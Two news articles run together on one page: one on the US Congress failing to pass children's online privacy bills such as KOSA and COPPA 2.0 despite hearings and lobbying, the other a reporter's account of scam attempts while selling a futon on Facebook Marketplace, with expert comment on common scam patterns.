Members of the US Congress touted improvements to children’s privacy protections as an urgent priority. So why didn’t they do anything about it?

It’s been 15 years since suicides overtook homicides as the second leading cause of death for children ages 10 to 14 years old. Two years since the first Meta whistleblower warned United States senators that America’s children are at risk from “disastrous” decisions being made in Silicon Valley. (And a little over a month since a second Meta whistleblower testified, “They knew and they were not acting on it.”) And it’s been roughly one year since a wave of new, younger lawmakers—many raising their own young children—were seated in the House of Representatives. “As a mom of two kids, you know, we want to make sure that their online experience is safe,” Representative Beth Van Duyne, a Texas Republican, tells WIRED.

All those changes—including an alarming doubling of the adolescent suicide rate—and yet, one constant remains: congressional inaction. Amid a flurry of blockbuster whistleblower hearings, soaring campaign promises, tear-soaked press conferences with the families of teens lost to cyberbullying, and dozens of competing bills that members have introduced aimed at protecting kids in cyberspace—nothing.

Congressional inaction has left the door open for the Biden administration to lead on the issue. On Wednesday, the Federal Trade Commission unveiled its proposal for a new set of guidelines to govern social media firms. The FTC wants to prohibit social media companies from identifying children—like targeting their cell numbers—when they’re online, while also limiting which data is collected on students, including having apps not target children under 13 with ads by default. With House Republicans now taking steps to impeach Joe Biden, why would they want to cede their oversight authority over American tech firms to the White House? Most don’t.

With so much interest—and increased pressure from agencies like the FTC—why hasn’t Congress protected kids yet? “I’ve never been able to figure that out either,” Representative Dan Crenshaw, a Texas Republican who sits on the Energy and Commerce Committee, which has jurisdiction on the issue, tells WIRED. Of course, there are theories floating around the marble halls of the US Capitol.

“M–O–N–E–Y”

Teams of tech lobbyists on Capitol Hill have dropped upward of $75 million (not including Q4 totals, which aren’t due until January 22) in 2023. Of the 637 “internet” lobbyists, as money and politics nonprofit Open Secrets dubs the sector, a whopping 73.31 percent are former government employees. Many of these lobbyists are from the same congressional offices and committees now tasked with regulating the internet. They’re not very subtle.

One social media firm or another seems to always be blanketing Washington with a feel-good, policy-focused ad campaign. At the start of the year, TikTok—which, at $3.7 million, spent more in Q3 lobbying this year than it did throughout all of 2019 and 2020 combined—plastered DC’s metro system, historic Union Station, and _The Washington Post_ with ads. When its CEO was dragged in to testify to an angry Congress this spring, it even paid for travel, room, and board for dozens of sympathetic “influencers.” For the past month or so, Meta ads have blanketed the Beltway: “Instagram supports federal legislation that puts parents in charge of teen app downloads,” the ad reads, without saying which measures it’s actively trying to kill on Capitol Hill.

Lawmakers say the ad blitz shows what they’re up against from technology firms. “M–O–N–E–Y,” Senator Josh Hawley, a Missouri Republican, spells out to WIRED. “They’re only in favor of stuff if they can write it.”

In the last Congress and again this summer, two key kid-focused digital measures both sailed through the Senate Commerce Committee. The Children and Teens’ Online Privacy Protection Act (COPPA 2.0) outlaws targeting children with advertising while also banning data collection on teenage social media users, to name a few of its provisions. The controversial Kids Online Safety Act (KOSA) mandates annual minor-focused risk assessments within social media giants while also giving parents and regulators new tools to protect children.

The two measures enjoy broad support, which is why they get out of committee with ease. But they’ve never been brought to the Senate floor for a vote by all 100 US senators. Critics say many members are supportive in the relatively obscure confines of their committees, but some of that support withers away under the intense lobbying scrutiny that comes once bills make the queue for Senate consideration. So far, members have been shielded, but those days seem to be over. “That’s because, in committee, they know they’re not going to have to vote on it on the floor. I know that for a fact,” Hawley, who’s up for reelection in 2024, says. “I can tell you, I’m going to get much more aggressive come the new year about forcing votes. I think it’s time to start putting people on record.”

The thing is, no one really knows what would happen if COPPA 2.0 or KOSA were voted on. “I don’t have any predictions or any insights,” Senator Roger Wicker, the Mississippi Republican who chaired the Commerce Committee until Democrats reclaimed senatorial power in 2021, tells WIRED. The resistance remains hard to nail down. Republicans blame Democrats. Democrats blame Republicans. Everyone blames the tech industry. “In the legislative process where you’re not bringing something to the floor for debate—which is where you could have a lot of input—then one person can hold something up,” Senator Maria Cantwell, a Democrat who chairs the Senate Commerce Committee, tells WIRED.

Because a broader data privacy bill remains gridlocked to death on Capitol Hill, Congress now has these offshoot measures aimed specifically at children, according to Cantwell. “We want to get a privacy bill, overall,” she says. “That’s what we focused on, because we think that framework gives the biggest protections, including for kids. But we’ve allowed these \[children-focused measures\] to see if they can make it through so that they wouldn’t have to be part of a larger discussion.”

While Hawley’s convinced Big Money keeps derailing the effort, others disagree. These issues just take time, nuance, and compromise, congressional leaders in both chambers argue. “We keep trying. We need a bipartisan, bicameral consensus, and that’s what we’re trying to do,” Representative Frank Pallone, the top Democrat on the House Energy and Commerce Committee, tells WIRED. “I don’t think it’s any special interest. I think it’s just the fact that it’s hard to get the Senate and the House and the Democrats and Republicans to agree, but we’re trying. I think we’re making progress.”

KOSA Complications

In the last Congress, KOSA—the Kids Online Safety Act—was formally endorsed by 13 Senate cosponsors. That number has more than tripled to 46 cosponsors in this Congress. KOSA cosponsors—Senators Marsha Blackburn, a Republican from Tennessee, and Richard Blumenthal, a Connecticut Democrat—say their personal lobbying of their colleagues is paying off, even if the measure remains stalled. “We’re pushing forward,” Blumenthal tells WIRED. “I’m very hopeful we’ll see a vote early next year. I think we’re feeling it.” Still, while the measure is broadly bipartisan, there’s been a recent wave of opposition to it on the civil libertarian left.

In our post-_Roe_ reality, digital rights and reproductive freedom are now intertwined, and highly suspect. KOSA is now in the crosshairs of groups like the American Civil Liberties Union (ACLU) over free speech and expression concerns. This fall, upward of 100 parents of trans and gender-expansive children penned an open letter opposing KOSA, saying it would “make our kids less safe, not more safe.”

“It would grant extraordinary new power to right-wing state attorneys general to dictate what content younger users can see on social media, cutting our kids off from lifesaving online resources and community,” the letter, released by digital rights group Fight for The Future, reads. “These are the same attorneys general that are actively working to ban gender-affirming health care that saves kids’ lives, criminalize drag performances, and label families that accept our children as ‘groomers’ and ‘child abusers.’”

The outcry from the progressive end of the spectrum has given those groups new, powerful advocates in Congress. In the end of the year legislative-twister at the Capitol, some KOSA supporters were itching for the proposal to be “fast-tracked,” a unanimous consent agreement where all 100 senators surrender their right to filibuster. But opponents got word and put an end to those efforts. “Until the bill is amended to foreclose the ability of state attorneys general to wage war on important reproductive and LGBTQ content, I will object to any unanimous consent request in relation to this legislation,” Senator Ron Wyden, an Oregon Democrat, told his Senate colleagues in a speech on the Senate floor last month.

KOSA’s sponsors know they still haven’t secured the 60 votes needed for passage, so one alerted party leaders they would oppose their own measure if it were brought up before the New Year. Senate Majority Leader Chuck Schumer’s office didn’t respond to a request for comment on whether he had—or has—plans to bring it to the floor. But Schumer says that before Congress can effectively regulate generative AI—one of his top priorities—America needs a federal data privacy law. “There was pretty much consensus that we need some kind of privacy law,” Schumer told reporters last month. “There are lots of disagreements, but it’s important to try and get that done.”

One Thing After Another

Over in the House, most eyes are on whether freshman speaker Mike Johnson can avert a government shutdown in the New Year. With such a green leader at the helm, House committees are, seemingly, more powerful than before, as members report trying to be the first person to get Johnson’s ear on an array of issues. While there’s no companion measure to KOSA in the House, children’s data privacy remains a top priority for the GOP majority in that chamber. The issue came up as a top priority in the last weekly in-person meeting of the Republican majority on the powerful House Energy and Commerce Committee.

“It’s not dead. It’s a priority for us,” Representative Richard Hudson, a North Carolina Republican, tells WIRED. He’s the current chair of the National Republican Congressional Campaign Committee where he’s tasked with helping the GOP expand its House majority—or, at least, not lose its majority—in 2024. Hudson knows many of his newer members ran on protecting the nation’s children from online predators, legal and illegal ones alike. Now comes the hard work of threading the proverbial needle. “It’s a very difficult question,” Hudson says. “You’re trying to balance rights versus protecting kids, and that’s tough. But our chairwoman is very focused on getting it done.”

If these children’s data measures are ever debated and voted on, dozens of other more niche privacy protection measures will likely be offered by both party’s rank-and-file lawmakers. Some ideas focus on protecting reproductive and geolocation data from law enforcement, especially in states that have outlawed most abortions. Other measures would strip Section 230 liability protections from sites that, say, host child sexual abuse material or promote the sexual abuse of minors. Another proposal would incentivize, through drastically increased federal fines, tech firms to proactively report any child exploitation efforts they uncover.

There’s more. This year in the Senate, a new bipartisan measure was introduced to outright ban social media for children under 13, while also requiring parental consent until those minors turn 18. Its sponsors include some of the Senate’s most conservative lawmakers—Tom Cotton, an Arkansas Republican, and Katie Britt, an Alabama Republican—and some of the chamber’s most progressive members—Chris Murphy, a Connecticut Democrat, and Brian Schatz, a Hawaii Democrat. Just bringing a measure to protect minors to the floor without ensuring its passage isn’t good enough for Schatz.

“If we can enact it, that would be great, but there’s no sense bringing something to the floor just to make a point,” Schatz, a father of two, tells WIRED.

If party leaders don’t put one or all of these bills on the floor for votes, Hawley, the Republican senator, vows to use all the instruments in his senatorial toolkit to force the issue in 2024.

“I think it’s time to start putting people on record,” Hawley, who authored a measure prohibiting social media accounts for children under age 16, tells WIRED. “Clearly, the leadership’s not going to bring this to the floor. I think that’s pretty clear. So I think we’ve got to get much more aggressive about forcing votes. What I’d really love to do is start trying to attach this to bills where we have roll call votes, because members hate roll call votes. So expect me to get very aggressive about this.”

Hot Air

Congress knows how to grab headlines—making laws is another conversation. This 118th Congress, with a mere 22 bills signed into law, is currently the least productive session witnessed in decades.

While no data privacy votes are scheduled in the new year, a fireworks display is already on the books. Fresh into the start of 2024, senators on the judiciary committee are dragging in five tech CEOs for a made-for-campaign-fodder hearing on children’s privacy issues. Law enforcement was already called in. See, while TikTok CEO Shou Zi Chew and Meta’s Mark Zuckerberg agreed to testify, subpoenas—some hand-delivered by US marshals after Discord and X “refused to cooperate”—were issued for the other three tech titans: X CEO Linda Yaccarino, Snap’s Evan Spiegel, and Discord’s Jason Citron.

“We’ve known from the beginning that our efforts to protect children online would be met with hesitation from Big Tech. They finally are being forced to acknowledge their failures when it comes to protecting kids. Now that all five companies are cooperating, we look forward to hearing from their CEOs,” Senators Dick Durbin, the committee’s Democratic chair, and Lindsey Graham, the committee’s top Republican, released in a joint statement the Monday before Thanksgiving. “Parents and kids demand action.”

Parents and kids are still wondering whether they can count on this Congress for that action. As of now, Congress has shown they can’t.

Congress Sure Made a Lot of Noise About Kids’ Privacy in 2023—and Not Much Else

I tried to sell a futon on Facebook Marketplace and nearly all I got were scammers.

This year, I decided to get rid of my Amazon starter couch and buy a real one. So I listed the generic, velvet-green futon on Facebook Marketplace, thinking some college students or recent New York transplants would happily scoop it up at a discounted price.

Since September, I have received many inquiries about this couch—nearly all from people who are likely scammers. They respond to the listing and offer me full price in Facebook Messenger from the jump (maybe my first clue, a real Facebook Marketplace veteran knows to haggle). Then, they ask some basic questions that are already in the item’s description: “Where are you located?” “What’s the condition?” Once I’ve repeated myself and given the cross streets closest to my home, there comes another refrain: The buyer either says they must pay now, so that I would take the item off the listing, or so that their husband/brother/son/mover, you name it, can come pick up the futon later that day.

Because it seems no real person would offer to send payment over Zelle _before_ ever seeing that the futon is real, I didn’t accept any of these offers. If I did, it’s likely these people would have sent a phishing link—either as a text to my phone number or in an email—disguised as communication from Zelle, looking to drain me of more money than the couch is worth. For now, I’m stuck with this futon, folded up in the corner of my tiny apartment. So far I’ve been unable to use Facebook Marketplace for its intended purpose: buying and selling useful things among my neighbors.

What happened to me is just one example of the many ways experts say people are getting scammed on Facebook Marketplace. Some scams come from what looks like a seller listing big-ticket items that don’t exist, like a car, and asking for prepaid debit cards purporting to be for eBay and Amazon payments as down payments before vanishing. Peer-to-peer online shopping has always been a buyer-beware endeavor, but sellers themselves are being scammed too. A freelance writer from Australia recounted her own embarrassing story in _The Guardian_ just last month, when she lost $1,000 while trying to sell a pair of boots after plugging sensitive information into a phishing link sent by a scammer.

Facebook is far from the only place scams happen—they’re common across many online selling platforms. But as its Marketplace has soared in popularity since its debut in 2016, scammers have sought to exploit the tool, experts say. Marketplace’s design supplied a layer of transparency and trust for person-to-person transactions; rather than interacting anonymously through a Craigslist ad, people were using profiles that typically included full names and photos. And with an existing Facebook profile, users could upload photos, write descriptions, and seamlessly post a listing with just a few clicks. By 2021, Facebook Marketplace had 1 billion monthly users, growing as ecommerce flourished during the height of the Covid-19 pandemic.

Now, bad actors are relying on that built-in trust to manipulate people out of far more money than their second-hand items may be worth. The scams have become a common feature of the app, and Meta, the $800 billion parent company of Facebook, hasn’t been able to shut them down.

“What happens offline often makes its way into online environments, and that unfortunately includes scams," Ryan Daniels, a Meta spokesperson, tells me. Daniels says the company works “aggressively to quickly identify, disable, and ban scams and accounts associated with them.” The company is also working on a new notification system to “help people better identify potential scams around payment apps" that should begin rolling out over the next few months. Daniels did not share more information about how those notifications will work.

Many scams and attempted scams go unreported, so it’s impossible to understand the scale of the problem. In a 2022 survey of 1,000 people in England, one in six said they were scammed on the marketplace. Another 2022 survey of 1,000 people in the US found that 62 percent had encountered a scam on Facebook. From January 2022 to November 2023, the Better Business Bureau’s scam tracker logged more than 1,200 reports that mentioned Facebook Marketplace in the US and Canada.

The scammers targeting me followed the same script: two messages from different accounts even included the same odd spacing format and just changed a word or two from each other, asking: “Alright I hope this is a legit post because I will be paying the $100 now so you can mark the item as sold my sister will come pick it up but I’ll send the money?” As more of these messages flowed into my DMs, I insisted on being paid in person, and the potential buyers vanished after one or two more wild excuses as to why that wouldn’t be possible. When I wrote “bye, scammer” to one, they replied with “lmao” just before I reported the profile to Facebook.

The scams follow similar patterns, because fraudsters conduct business like multilevel marketers, says Adrianus Warmenhoven, a member of the security advisory board for network security company NordVPN. Someone may develop a scam, then sell it as a toolkit with scripts and phishing links. People also can buy orphaned and hacked Facebook accounts, giving them access to profiles that look like real people with long account histories. Many of the messages I received came from accounts that were created a decade ago or more, showing that these aren’t new accounts created for the sole purpose of scamming people on Marketplace. “A lot of criminal stuff is not being executed by computer-savvy or even criminal-savvy people,” Warmenhoven says. Some of these tools, experts say, are sold on the dark web. But there are also chats on Telegram advertising hundreds of bundled bunches of Facebook accounts from specific countries for sale in bulk. Telegram did not respond to a request for comment.

Some scams encourage people to upgrade their Zelle accounts to a business tier to receive money from a buyer, according to the Better Business Bureau, and come from emails mimicking Zelle, but with different domains. That upgrade appears to cost $300, and the buyer promises to send it if the seller will then refund it. The catch: the $300 was never sent and appeared only in faked screenshots or emails. So, when the seller sends $300, they're really just losing the money.

Zelle’s website notes that it will send emails only from domains ending in @zelle.com and @zellepay.com, and any others could be scams. The company did not answer more specific questions about Facebook Marketplace scams, citing an effort to keep intel from fraudsters.

Other scammers use Google Voice, asking people for their verification code—all under the guise of verifying that the person isn’t a scammer. But with that code, a scammer can then create a Google Voice number using the victim’s phone number, which helps them to conceal their identity for future scams. Additionally, it can help them impersonate someone and get access to their accounts, according to the US Federal Trade Commission. When asked for comment on Facebook Marketplace scams, Google pointed to guidance it posts for people to not share their verification codes, and the company has ways for people to reclaim stolen Google Voice numbers.

Experts say the constant evolving nature of scams makes them tricky for companies to defeat. “It’s a giant game of whack-a-mole,” says Zulfikar Ramzan, chief scientist with digital security company Aura. “They change something about the way they’ve done a scam. It’s really difficult for any organization to keep up with that volume at scale.”

Meta has continued to grow Facebook Marketplace even as scams linger. A 2022 ProPublica investigation found that Facebook Marketplace scams had run rampant and that the company was potentially understaffed to a degree that impeded its ability to stop scammers. In addition to in-house workers, Meta had contracted 400 Accenture workers around the world and gave each person more than 600 complaints or requests for help to process each day. Even worse, ProPublica found a number of alleged armed robberies and murders had occurred in relation to Facebook Marketplace meetups. Meta, Facebook’s parent company, did not answer questions about how it monitors scams now and the information in the ProPublica investigation.

Facebook Marketplace has evolved to more than just selling in the neighborhood. There are options to ship products after a sale, and some small shops have used the platform to grow their business. All of these different types of transactions bring different concerns about scams. Marketplace offers purchase protection, but it doesn’t cover payments made through third-party sites like Zelle, items picked up locally, or transactions conducted through Facebook Messenger.

I lost track of the number of people who seemed eager to scam me—I reported lots of scammers and then left chats, which disappeared. A few people may have been legitimately interested but dropped off early in the conversation. In the end, the frustration wasn’t worth the cash. I’m stuck with this couch, and there’s only one solution left. I’m heading over to another side of Facebook entirely: Buy Nothing.

Tag

#git